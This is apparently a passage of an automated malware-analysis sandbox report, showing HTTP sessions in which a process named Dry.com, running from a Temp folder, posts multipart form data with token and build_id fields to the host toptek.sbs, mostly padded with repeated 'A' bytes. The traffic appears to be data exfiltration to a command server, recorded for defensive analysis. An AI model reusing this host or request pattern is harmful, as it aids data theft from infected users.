                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:59 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  20192.168.2.44977894.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:00 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----Z5XL6XTRI58QIEKFKFCT
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 131557
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:00 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------Z5XL6XTRI58QIEKFKFCTContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------Z5XL6XTRI58QIEKFKFCTContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------Z5XL6XTRI58QIEKFKFCTCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:22:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
